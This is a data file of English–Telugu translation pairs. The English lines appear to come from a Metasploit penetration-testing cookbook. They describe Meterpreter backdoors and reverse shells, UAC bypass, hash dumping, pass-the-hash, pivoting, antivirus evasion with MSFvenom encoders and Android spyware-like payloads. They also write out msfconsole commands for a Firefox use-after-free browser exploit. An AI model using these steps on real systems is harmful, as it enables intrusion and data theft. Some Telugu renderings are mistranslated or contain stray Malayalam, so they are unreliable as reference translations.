{"en":"Looking at the target machine, we can see the attack consumes large chunks of memory in the target by sending SMB requests with the NetBIOS Session Service (NBSS) length header value set to the maximum possible value, which initiates a large numbers of sessions, and the memory does not get freed, halting the target machine:","translation":"లక్ష్య యంత్రాన్ని పరిశీలిస్తే, నెట్‌బయోస్ సెషన్ సర్వీస్ (NBSS) పొడవు హెడర్ విలువను గరిష్ట సాధ్యమయ్యే విలువకు సెట్ చేయడం ద్వారా SMB అభ్యర్థనలను పంపడం ద్వారా దాడి లక్ష్యంలో పెద్ద మొత్తంలో మెమరీని వినియోగిస్తుందని మనం చూడవచ్చు, ఇది పెద్ద సంఖ్యలో సెషన్‌లను ప్రారంభిస్తుంది మరియు మెమరీ విడుదల చేయబడదు, లక్ష్య యంత్రాన్ని నిలిపివేస్తుంది:","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"This command is used to migrate from one process context to another.","translation":"ఒక ప్రక్రియ సందర్భం నుండి మరొకదానికి మారడానికి ఈ ఆదేశం ఉపయోగించబడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"We can migrate to any other active process by using the process name or the ID.","translation":"ప్రక్రియ పేరు లేదా IDని ఉపయోగించి, మేము ఏదైనా ఇతర క్రియాశీల ప్రక్రియకు మారవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The ps command can be used to identify all active processes along with their names and IDs.","translation":"ps ఆదేశాన్ని అన్ని క్రియాశీల ప్రక్రియలను వాటి పేర్లు మరియు IDలతో గుర్తించడానికి ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"These two Meterpreter commands are very handy and are used frequently during penetration testing.","translation":"ఈ రెండు మీటర్‌ప్రెటర్ ఆదేశాలు చాలా ఉపయోగకరంగా ఉంటాయి మరియు చొచ్చుకుపోయే పరీక్ష సమయంలో తరచుగా ఉపయోగించబడతాయి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"UAC is inherently broken and can be trivially defeated.","translation":"UAC సహజంగానే విచ్ఛిన్నమైంది మరియు సులభంగా ఓడిపోవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"For this recipe, we will target the Windows 7 machine.","translation":"ఈ రెసిపీ కోసం, మేము Windows 7 మెషీన్‌ను లక్ష్యంగా చేసుకుంటాము.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To generate the backdoor, we will use a Windows Meterpreter reverse TCP payload.","translation":"బ్యాక్‌డోర్‌ను రూపొందించడానికి, మేము విండోస్ మీటర్‌ప్రెటర్ రివర్స్ TCP పేలోడ్‌ను ఉపయోగిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"After setting the listening address with the LHOST option and looking at the available options for the generate command, we will use the -t option for the output format.","translation":"LHOST ఎంపికతో వినడానికి చిరునామాను సెట్ చేసిన తర్వాత మరియు ఉత్పత్తి చేయడానికి అందుబాటులో ఉన్న ఎంపికలను చూసిన తర్వాత, మేము అవుట్‌పుట్ ఫార్మాట్ కోసం -t ఎంపికను ఉపయోగిస్తాము.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Now that we have created the backdoor, we need to set up a listener to receive the reverse shell.","translation":"బ్యాక్‌డోర్‌ను రూపొందించిన తర్వాత, రివర్స్ షెల్‌ను స్వీకరించడానికి మేము ఒక శ్రోతను ఏర్పాటు చేయాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"By starting the listener with run -j, it will run it in the context of a job, allowing us to continue using the msfconsole.","translation":"రన్ -jతో శ్రోతను ప్రారంభించడం ద్వారా, ఇది ఒక పని సందర్భంలో నడుస్తుంది, ఇది msfconsoleని ఉపయోగించడం కొనసాగించడానికి అనుమతిస్తుంది.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"To copy the backdoor to the target, we can use the FTP File Server auxiliary module.","translation":"బ్యాక్‌డోర్‌ను లక్ష్యానికి కాపీ చేయడానికి, మేము FTP ఫైల్ సర్వర్ సహాయక మాడ్యూల్‌ను ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"If everything went well, we should have a new Meterpreter session on the target machine.","translation":"అన్నీ బాగా జరిగితే, లక్ష్య యంత్రంలో మనకు కొత్త మీటర్‌ప్రెటర్ సెషన్ ఉండాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Now that we have a session on the target machine, one of the first things we want is to try to elevate our privileges.","translation":"లక్ష్య యంత్రంలో మనకు సెషన్ ఉన్నందున, మనం చేయాలనుకుంటున్న మొదటి విషయాలలో ఒకటి మన అధికారాలను పెంచడానికి ప్రయత్నించడం.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"However, privilege escalation using the getsystem command fails because of UAC.","translation":"అయితే, getsystem ఆదేశాన్ని ఉపయోగించి అధికారాల పెంపు UAC కారణంగా విఫలమవుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Great, we were able to bypass UAC, and we got a new Meterpreter session.","translation":"గొప్పది, మేము UACని దాటగలిగాము మరియు మాకు కొత్త మీటర్‌ప్రెటర్ సెషన్ వచ్చింది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Dumping the contents of the SAM database.","translation":"SAM డేటాబేస్ యొక్క విషయాలను డంప్ చేయడం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"First, we will start with the classic Meterpreter hashdump command.","translation":"ముందుగా, మేము క్లాసిక్ మీటర్‌ప్రెటర్ హాష్‌డంప్ ఆదేశంతో ప్రారంభిస్తాము.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"To perform a pass the hash attack, we can use the Microsoft Windows Authenticated User Code Execution exploit module.","translation":"హాష్ దాడిని నిర్వహించడానికి, మేము Microsoft Windows Authenticated User Code Execution ఎక్స్‌ప్లాయిట్ మాడ్యూల్‌ను ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Incognito allows us to impersonate user tokens.","translation":"ఇన్‌కోగ్నిటో వినియోగదారు టోకెన్‌లను అనుకరించడానికి అనుమతిస్తుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"First, we will identify the valid tokens on the target system using the list_tokens command.","translation":"ముందుగా, list_tokens ఆదేశాన్ని ఉపయోగించి లక్ష్య వ్యవస్థలోని చెల్లుబాటు అయ్యే టోకెన్‌లను గుర్తిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The attacker can compromise a web server that is connected to the internet.","translation":"ఆക്രമించే వ్యక్తి ఇంటర్నెట్‌కు కనెక్ట్ చేయబడిన వెబ్ సర్వర్‌ను రాజీ పడవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Then, the attacker uses the compromised server to access the internal network.","translation":"అప్పుడు, అంతర్గత నెట్‌వర్క్‌ను యాక్సెస్ చేయడానికి దాడి చేసే వ్యక్తి రాజీపడిన సర్వర్‌ను ఉపయోగిస్తాడు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"This is a typical scenario that involves pivoting.","translation":"ఇది సాధారణ దృశ్యం, దీనిలో పివోటింగ్ ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"In our lab, we use a dual home server to simulate an internet-facing server with access to the LAN network.","translation":"మా ల్యాబ్‌లో, మేము LAN నెట్‌వర్క్‌ను యాక్సెస్ చేయడానికి ఇంటర్నెట్‌ను ఎదుర్కొనే సర్వర్‌ను అనుకరించడానికి ద్వంద్వ హోమ్ సర్వర్‌ను ఉపయోగిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To set up the Windows 10 client machine for this recipe, we first need to configure the network adapter.","translation":"ఈ రెసిపీ కోసం Windows 10 క్లయింట్ మెషీన్‌ను సెటప్ చేయడానికి, మనం మొదట నెట్‌వర్క్ అడాప్టర్‌ను కాన్ఫిగర్ చేయాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Then, we will disable the Windows 10 firewall.","translation":"అప్పుడు, మేము Windows 10 ఫైర్‌వాల్‌ను నిలిపివేస్తాము.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"First, we will target the Linux server using the Samba \"username map script\" Command Execution exploit.","translation":"ముందుగా, మనం Samba \"username map script\" కమాండ్ ఎగ్జిక్యూషన్ ఎక్స్‌ప్లాయిట్‌ని ఉపయోగించి Linux సర్వర్‌ను లక్ష్యంగా చేసుకుంటాము.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Now that we have a session, we will use the sessions command with the -u option to upgrade the shell to a Meterpreter session.","translation":"మనకు సెషన్ ఉన్నందున, షెల్‌ను మీటర్‌ప్రెటర్ సెషన్‌కు అప్‌గ్రేడ్ చేయడానికి -u ఎంపికతో సెషన్స్ కమాండ్‌ను ఉపయోగిస్తాము.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"With our newly created Meterpreter session, we can use the ifconfig command on the target to see the available interfaces.","translation":"మన కొత్తగా సృష్టించబడిన మీటర్‌ప్రెటర్ సెషన్‌తో, అందుబాటులో ఉన్న ఇంటర్‌ఫేస్‌లను చూడటానికి లక్ష్యంపై ifconfig కమాండ్‌ను ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Our next aim will be to find which systems are available on this local network.","translation":"ఈ లోకల్ నెట్‌వర్క్‌లో ఏ సిస్టమ్‌లు అందుబాటులో ఉన్నాయో తెలుసుకోవడం మా తదుపరి లక్ష్యం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To do this, we will use the Multi Gather Ping Sweep post-exploitation module.","translation":"దీని కోసం, మేము మల్టీ గ్యాదర్ పింగ్ స్వీప్ పోస్ట్-ఎక్స్‌ప్లాయిటేషన్ మాడ్యూల్‌ను ఉపయోగిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To access the target in the 10.0.0.0/24 network, we will have to route all the packets through the compromised Linux machine.","translation":"10.0.0.0/24 నెట్‌వర్క్‌లోని లక్ష్యాన్ని యాక్సెస్ చేయడానికి, రాజీపడిన Linux మెషీన్ ద్వారా అన్ని ప్యాకెట్‌లను రూట్ చేయాలి.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Now, you can do a quick port scan on the IP address 10.0.0.161 using the TCP Port Scanner auxiliary module.","translation":"ఇప్పుడు, మీరు TCP పోర్ట్ స్కానర్ సహాయక మాడ్యూల్‌ని ఉపయోగించి IP చిరునామా 10.0.0.161లో శీఘ్ర పోర్ట్ స్కాన్ చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Now that we know the target is running SMB, we can use the SMB Version Detection auxiliary module to display information about the system.","translation":"లక్ష్యం SMBని నడుపుతోందని మనకు తెలిసినందున, సిస్టమ్ గురించి సమాచారాన్ని ప్రదర్శించడానికి SMB వెర్షన్ డిటెక్షన్ సహాయక మాడ్యూల్‌ను ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"With the information gathered, we can use the Microsoft Windows Authenticated User Code Execution exploit module.","translation":"సేకరించిన సమాచారంతో, మేము Microsoft Windows Authenticated User Code Execution ఎక్స్‌ప్లాయిట్ మాడ్యూల్‌ను ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Discussing pivoting is never complete without talking about port forwarding.","translation":"పోర్ట్ ఫార్వార్డింగ్ గురించి మాట్లాడకుండా పివోటింగ్ గురించి చర్చించడం ఎప్పుడూ పూర్తి కాదు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"For this recipe, we will turn on Internet Information Services on the target Windows 10 machine.","translation":"ఈ రెసిపీ కోసం, మేము లక్ష్య Windows 10 మెషీన్‌లో ఇంటర్నెట్ ఇన్ఫర్మేషన్ సర్వీసెస్‌ను ఆన్ చేస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Successful execution of the command shows that a local TCP relay has been set up.","translation":"కమాండ్ విజయవంతంగా అమలు చేయబడిందని, లోకల్ TCP రిలే సెటప్ చేయబడిందని చూపిస్తుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"During a penetration test, we are not always getting sessions with system or even administrator privileges.","translation":"పెనెట్రేషన్ పరీక్ష సమయంలో, మనకు ఎల్లప్పుడూ సిస్టమ్ లేదా అడ్మినిస్ట్రేటర్ అధికారాలతో సెషన్‌లు లభించవు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"With credential harvesting, we will try to perform a phishing attack on the target.","translation":"గుర్తింపు సమాచార సేకరణతో, మేము లక్ష్యంపై ఫిషింగ్ దాడిని చేయడానికి ప్రయత్నిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"You definitely need a sound knowledge of Ruby scripting if you want to build good modules.","translation":"మంచి మాడ్యూల్స్ నిర్మించాలనుకుంటే, మీరు ఖచ్చితంగా రూబీ స్క్రిప్టింగ్ గురించి మంచి జ్ఞానం కలిగి ఉండాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"You can also contribute to the Metasploit community by releasing your module and let others benefit from it.","translation":"మీ మాడ్యూల్‌ను విడుదల చేయడం ద్వారా మీరు మెటాస్ప్లోయిట్ కమ్యూనిటీకి కూడా సహకరించవచ్చు మరియు ఇతరులు దాని నుండి ప్రయోజనం పొందవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"MSFvenom is the tool to use for payload generation and encoding and it is an evolution of msfpayload and msfencode.","translation":"పేలోడ్ ఉత్పత్తి మరియు ఎన్‌కోడింగ్ కోసం ఉపయోగించాల్సిన సాధనం MSFvenom మరియు ఇది msfpayload మరియు msfencode యొక్క పరిణామం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"In this chapter, we dig a bit deeper on the available payloads, learn why encoders can be useful when trying to evade detection.","translation":"ఈ అధ్యాయంలో, మేము అందుబాటులో ఉన్న పేలోడ్‌లపై కొంచెం లోతుగా పరిశీలిస్తాము, గుర్తింపును తప్పించుకోవడానికి ప్రయత్నిస్తున్నప్పుడు ఎన్‌కోడర్‌లు ఎందుకు ఉపయోగకరంగా ఉంటాయో తెలుసుకుంటాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"We can tell MSFvenom is one of the most versatile and useful payload-generation tools just by looking at the available payloads.","translation":"అందుబాటులో ఉన్న పేలోడ్‌లను చూడటం ద్వారా MSFvenom అత్యంత బహుముఖ మరియు ఉపయోగకరమైన పేలోడ్-తరం సాధనాల్లో ఒకటని మనం చెప్పగలం.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To generate a payload, we always need to use at least two options, -p and -f.","translation":"పేలోడ్‌ను రూపొందించడానికి, మనం ఎల్లప్పుడూ కనీసం రెండు ఎంపికలను ఉపయోగించాలి, -p మరియు -f.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"The -p option is used to specify which payload to generate from all those available in the Metasploit Framework.","translation":"-p ఎంపిక మెటాస్ప్లోయిట్ ఫ్రేమ్‌వర్క్‌లో అందుబాటులో ఉన్న వాటిలో ఏ పేలోడ్‌ను రూపొందించాలో పేర్కొనడానికి ఉపయోగించబడుతుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The -f option is used to specify the output format.","translation":"-f ఎంపిక అవుట్‌పుట్ ఫార్మాట్‌ను పేర్కొనడానికి ఉపయోగించబడుతుంది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Executable formats will generate programs and scripts, while transform formats will just produce the payload.","translation":"ఎగ్జిక్యూటబుల్ ఫార్మాట్‌లు ప్రోగ్రామ్‌లు మరియు స్క్రిప్ట్‌లను ఉత్పత్తి చేస్తాయి, అయితే ట్రాన్స్‌ఫార్మ్ ఫార్మాట్‌లు పేలోడ్‌ను మాత్రమే ఉత్పత్తి చేస్తాయి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"We can also specify a custom payload by using the -p option with -.","translation":"మనం -p ఎంపికను ఉపయోగించి కస్టమ్ పేలోడ్‌ను కూడా పేర్కొనవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"When generating payloads, we use the -a option for the architecture to use.","translation":"పేలోడ్‌లను రూపొందించేటప్పుడు, మనం ఉపయోగించాల్సిన ఆర్కిటెక్చర్ కోసం -a ఎంపికను ఉపయోగిస్తాము.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"One useful feature when doing exploit development, is the --smallest option, which we can use to generate the smallest possible payload.","translation":"ఎక్స్‌ప్లాయిట్ అభివృద్ధి చేసేటప్పుడు ఉపయోగకరమైన ఫీచర్ ఏమిటంటే --చిన్నది ఎంపిక, ఇది సాధ్యమైనంత చిన్న పేలోడ్‌ను రూపొందించడానికి మనం ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To test this payload, we can set the execution permission using the chmod command, and then run the payload.","translation":"ఈ పేలోడ్‌ను పరీక్షించడానికి, మనం chmod కమాండ్ ఉపయోగించి ఎగ్జిక్యూషన్ అనుమతిని సెట్ చేయవచ్చు, ఆపై పేలోడ్‌ను అమలు చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"In another terminal, we can use netcat to connect to the bind shell on port 4444.","translation":"మరొక టెర్మినల్‌లో, మనం పోర్ట్ 4444లో బైండ్ షెల్‌కు కనెక్ట్ చేయడానికి నెట్‌క్యాట్‌ని ఉపయోగించవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Now that we have learned how to create a basic bind shell, we will try to create a reverse shell.","translation":"ప్రాథమిక బైండ్ షెల్‌ను ఎలా తయారు చేయాలో ఇప్పుడు మనం నేర్చుకున్నాము, మనం రివర్స్ షెల్‌ను సృష్టించడానికి ప్రయత్నిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The options available are overwhelming, but, for the time being, we just need to set up the basic options, such as the listen address and port.","translation":"అందుబాటులో ఉన్న ఎంపికలు చాలా ఉన్నాయి, కానీ ప్రస్తుతానికి, మనం వినడానికి చిరునామా మరియు పోర్ట్ వంటి ప్రాథమిక ఎంపికలను మాత్రమే సెటప్ చేయాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Creating payloads for a Windows target is as easy.","translation":"విండోస్ లక్ష్యం కోసం పేలోడ్‌లను సృష్టించడం కూడా సులభం.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Specifying an additional win32 shellcode, by using the -c or --add-code option, we can turn multiple payloads into one.","translation":"-c లేదా --add-code ఎంపికను ఉపయోగించడం ద్వారా అదనపు win32 షెల్‌కోడ్‌ను పేర్కొనడం ద్వారా, మనం బహుళ పేలోడ్‌లను ఒకే పేలోడ్‌గా మార్చవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Nowadays security products, such as Intrusion Detection Systems (IDSs), antivirus and anti-malware software, can easily pick up the shellcode generated by MSFvenom.","translation":"నేడు, ఇంట్రూజన్ డిటెక్షన్ సిస్టమ్స్ (IDSలు), యాంటీవైరస్ మరియు యాంటీ-మాల్వేర్ సాఫ్ట్‌వేర్ వంటి భద్రతా ఉత్పత్తులు MSFvenom ద్వారా ఉత్పత్తి చేయబడిన షెల్‌కోడ్‌ను సులభంగా గుర్తించగలవు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"To encode one of our previous payloads, we simple add the -e option, followed by the encoder we want to use.","translation":"మన మునుపటి పేలోడ్‌లలో ఒకదాన్ని ఎన్‌కోడ్ చేయడానికి, మనం -e ఎంపికను జోడిస్తాము, ఆపై మనం ఉపయోగించాలనుకుంటున్న ఎన్‌కోడర్‌ను జోడిస్తాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"However, when we get access to a client machine the reality is different.","translation":"అయితే, మనం క్లయింట్ మెషీన్‌ను యాక్సెస్ చేసినప్పుడు వాస్తవం భిన్నంగా ఉంటుంది.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Client-Side Exploitation and Antivirus BypassChapter 7 [ 262 ] Exploiting a Windows 10 machine In this recipe, we will exploit a use-after-free vulnerability present in nsSMILTimeContainer::NotifyTimeChange() across numerous versions of Mozilla Firefox on Microsoft Windows.","translation":"క్లయింట్-సైడ్ ఎక్స్‌ప్లోయిటేషన్ మరియు యాంటీవైరస్ బైపాస్ చాప్టర్ 7 [ 262 ] విండోస్ 10 మెషీన్‌ను ఎక్స్‌ప్లోయిట్ చేయడం ఈ రెసిపీలో, మేము మైక్రోసాఫ్ట్ విండోస్‌లో మొజిల్లా ఫైర్‌ఫాక్స్ యొక్క అనేక వెర్షన్‌లలో nsSMILTimeContainer::NotifyTimeChange()లో ఉన్న ఉపయోగం-తర్వాత-ఉచిత దుర్బలత్వాన్ని ఉపయోగించుకుంటాము.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"Getting ready So, before we begin we need to download Mozilla Firefox 41.0 from https:/​/​ftp.​mozilla. org/​pub/​firefox/​releases/​41.​0/​win32/​en-​US/​Firefox%20Setup%2041.​0.​exe and install it on our Windows 10 target machine.","translation":"సిద్ధం కావడానికి, మనం ప్రారంభించే ముందు, https:/​/​ftp.​mozilla నుండి Mozilla Firefox 41.0ని డౌన్‌లోడ్ చేసుకోవాలి. org/​pub/​firefox/​releases/​41.​0/​win32/​en-​US/​Firefox%20Setup%2041.​0.​exe మరియు దానిని మా విండోస్ 10 లక్ష్య యంత్రంలో ఇన్‌స్టాల్ చేయాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"How to do it... As always, good reconnaissance makes all the difference, so we first need to gather information about the browser the victim is using.","translation":"ఎలా చేయాలి... ఎల్లప్పుడూ వలె, మంచి పునరుద్ధరణ అన్ని తేడాను కలిగిస్తుంది, కాబట్టి మొదట బాధితుడు ఉపయోగిస్తున్న బ్రౌజర్ గురించి సమాచారాన్ని సేకరించాలి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"To help us with this task, we can use the HTTP Client Information Gather1. auxiliary module by specifying the IP address and port of the host to listen on and the URI to use, then use one of your favorite pretexts to make the victim open the link:","translation":"ఈ పనిలో మాకు సహాయం చేయడానికి, వినడానికి హోస్ట్ యొక్క IP చిరునామా మరియు పోర్ట్‌ను పేర్కొనడం ద్వారా మరియు ఉపయోగించాల్సిన URIని పేర్కొనడం ద్వారా మేము HTTP క్లయింట్ సమాచార సేకరణ సహాయక మాడ్యూల్‌ను ఉపయోగించవచ్చు, ఆపై బాధితుడిని లింక్‌ను తెరవడానికి మీకు ఇష్టమైన పూర్వ పాఠాలలో ఒకదాన్ని ఉపయోగించండి:","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"msf > use auxiliary/gather/browser_info","translation":"msf > auxiliary/gather/browser_infoని ఉపయోగించండి","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"msf auxiliary(gather/browser_info) > set SRVHOST 192.168.216.5","translation":"msf సహాయక(సేకరించు/browser_info) > SRVHOST 192.168.216.5ని సెట్ చేయండి","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"msf auxiliary(gather/browser_info) > set SRVPORT 80","translation":"msf సహాయక(సేకరించు/browser_info) > SRVPORT 80ని సెట్ చేయండి","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"msf auxiliary(gather/browser_info) > set URIPATH /","translation":"msf సహాయక(సేకరించు/browser_info) > URIPATH /ని సెట్ చేయండి","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"msf auxiliary(gather/browser_info) > run","translation":"msf సహాయక(సేకరించు/browser_info) > రన్ చేయండి","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Looking at the output, we can see that the victim is running Firefox version 41.0.","translation":"అవుట్‌పుట్‌ను చూస్తే, బాధితుడు Firefox వెర్షన్ 41.0ని నడుపుతున్నాడని మనం చూడవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"With this information, we can see that there is an exploit we can use on Firefox nsSMILTimeContainer::NotifyTimeChange() with the RCE exploit module.","translation":"ఈ సమాచారంతో, RCE ఎక్స్‌ప్లోయిట్ మాడ్యూల్‌తో Firefox nsSMILTimeContainer::NotifyTimeChange()లో మనం ఉపయోగించగల ఎక్స్‌ప్లోయిట్ ఉందని మనం చూడవచ్చు.","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"To exploit the target using this module, we first need to set the IP address and3. port of the host we will be serving the exploit on and the URI to use, then set the payload we want to execute on the target, and since we are using a reverse shell, we also need to specify the listening host IP address:","translation":"ఈ మాడ్యూల్‌ని ఉపయోగించి లక్ష్యాన్ని ఉపయోగించుకోవడానికి, మనం మొదట IP చిరునామాను సెట్ చేయాలి మరియు మనం ఎక్స్‌ప్లోయిట్‌ను అందించే హోస్ట్ యొక్క పోర్ట్ మరియు ఉపయోగించాల్సిన URIని సెట్ చేయాలి, ఆపై లక్ష్యంపై అమలు చేయాలనుకుంటున్న పేలోడ్‌ను సెట్ చేయాలి మరియు మేము రివర్స్ షెల్‌ని ఉపయోగిస్తున్నందున, మనం వినడానికి హోస్ట్ IP చిరునామాను కూడా పేర్కొనాలి:","target_lang":"te","domain":"technical","complexity":"complex"}
{"en":"msf auxiliary(gather/browser_info) > use exploit/windows/browser/firefox_smil_uaf","translation":"msf సహాయక(సేకరించు/browser_info) > exploit/windows/browser/firefox_smil_uafని ఉపయోగించండి","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"msf exploit(windows/browser/firefox_smil_uaf) > set SRVHOST 192.168.216.5","translation":"msf ఎక్స్‌ప్లోయిట్(విండోస్/బ్రౌజర్/firefox_smil_uaf) > SRVHOST 192.168.216.5ని సెట్ చేయండి","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"msf exploit(windows/browser/firefox_smil_uaf) > set SRVPORT 80","translation":"msf ఎక్స్‌ప్లోయిట్(విండోస్/బ్రౌజర్/firefox_smil_uaf) > SRVPORT 80ని సెట్ చేయండి","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"msf exploit(windows/browser/firefox_smil_uaf) > set URIPATH /","translation":"msf ఎక్స్‌ప్లోయిట్(విండోస్/బ్రౌజర్/firefox_smil_uaf) > URIPATH /ని సెట్ చేయండి","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"msf exploit(windows/browser/firefox_smil_uaf) > set PAYLOAD windows/meterpreter/reverse_tcp","translation":"msf ఎక్స్‌ప్లోయిట్(విండోస్/బ్రౌజర్/firefox_smil_uaf) > PAYLOAD windows/meterpreter/reverse_tcpని సెట్ చేయండి","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"msf exploit(windows/browser/firefox_smil_uaf) > set LHOST 192.168.216.5","translation":"msf ఎక్స్‌ప్లోయిట్(విండోస్/బ్రౌజర్/firefox_smil_uaf) > LHOST 192.168.216.5ని సెట్ చేయండి","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Now that we have everything set up, we will need the victim to browse to our site—this can be achieved using several means, email, social media, and so on","translation":"ఇప్పుడు మనం ప్రతిదీ సెటప్ చేసాము, బాధితుడు మా సైట్‌ను బ్రౌజ్ చేయాలి—దీనిని అనేక మార్గాల ద్వారా సాధించవచ్చు, ఇమెయిల్, సోషల్ మీడియా మొదలైనవి.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"After allowing unknown sources, you can install the backdoor and get a session.","translation":"తెలియని మూలాలను అనుమతించిన తర్వాత, మీరు బ్యాక్‌డోర్‌ను ఇన్‌స్టాల్ చేసి సెషన్‌ను పొందవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Meterpreter session opened.","translation":"మీటర్‌ప్రెటర్ సెషన్ ప్రారంభించబడింది.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"Besides all the regular meterpreter commands, using the Android payload we get a couple of specific commands.","translation":"అన్ని సాధారణ మీటర్‌ప్రెటర్ ఆదేశాలతో పాటు, Android పేలోడ్‌ను ఉపయోగించి, మేము కొన్ని నిర్దిష్ట ఆదేశాలను పొందుతాము.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"We can now get the call logs, read and send SMS messages, and get the location of the device.","translation":"ఇప్పుడు మేము కాల్ లాగ్‌లను పొందవచ్చు, SMS సందేశాలను చదవవచ్చు మరియు పంపవచ్చు మరియు పరికరం యొక్క స్థానాన్ని పొందవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"Metasploit is not restricted to Android devices.","translation":"మెటాస్ప్లోయిట్ Android పరికరాలకు మాత్రమే పరిమితం కాదు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"You can also create a backdoor with msfvenom, using the apple_ios/aarch64/meterpreter_reverse_tcp payload.","translation":"మీరు apple_ios/aarch64/meterpreter_reverse_tcp పేలోడ్‌ను ఉపయోగించి msfvenomతో బ్యాక్‌డోర్‌ను కూడా సృష్టించవచ్చు.","target_lang":"te","domain":"technical","complexity":"moderate"}
{"en":"The Social-Engineer Toolkit (SET) is an open source penetration testing framework.","translation":"సోషల్-ఇంజనీర్ టూల్‌కిట్ (SET) అనేది ఓపెన్ సోర్స్ చొచ్చుకుపోయే పరీక్షా ఫ్రేమ్‌వర్క్.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"SET can be installed on Linux and macOS.","translation":"SETని Linux మరియు macOSలో ఇన్‌స్టాల్ చేయవచ్చు.","target_lang":"te","domain":"technical","complexity":"simple"}
{"en":"SET is a Python-based automation tool.","translation":"SET అనేది పైథాన్ ఆధారిత ఆటోమేషన్ సాధనం.","target_lang":"te","domain":"technical","complexity":"simple"}
